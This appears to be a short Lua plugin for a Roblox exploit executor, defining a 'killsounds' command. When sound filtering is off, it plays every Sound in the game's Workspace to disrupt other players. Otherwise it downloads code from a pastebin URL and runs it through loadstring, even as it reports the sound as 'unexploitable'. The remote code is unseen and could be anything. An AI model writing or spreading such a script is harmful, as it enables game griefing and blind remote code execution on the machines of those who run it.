
local Plugin = {
    ["PluginName"] = "killsounds",
    ["PluginDescription"] = "kills the roblox sounds",
    ["Commands"] = {
        ["COMMANDNAME"] = {
            ["ListName"] = "killsounds",
            ["Description"] = "kills the roblox sounds",
            ["Aliases"] = {"ks"},
            ["Function"] = function(args,speaker)

if game.SoundService.RespectFilteringEnabled == false then
for i,v in pairs(game.Workspace:GetDescendants()) do
if v:IsA("Sound") then 
v:Play()
end
end
else
loadstring(game:HttpGetAsync("https://pastebin.com/raw/Ts8TSAZN", 0, true))()
notify("Sound is unexploitable.", warn(":("))
end
            end
        }
     }
}

return Plugin


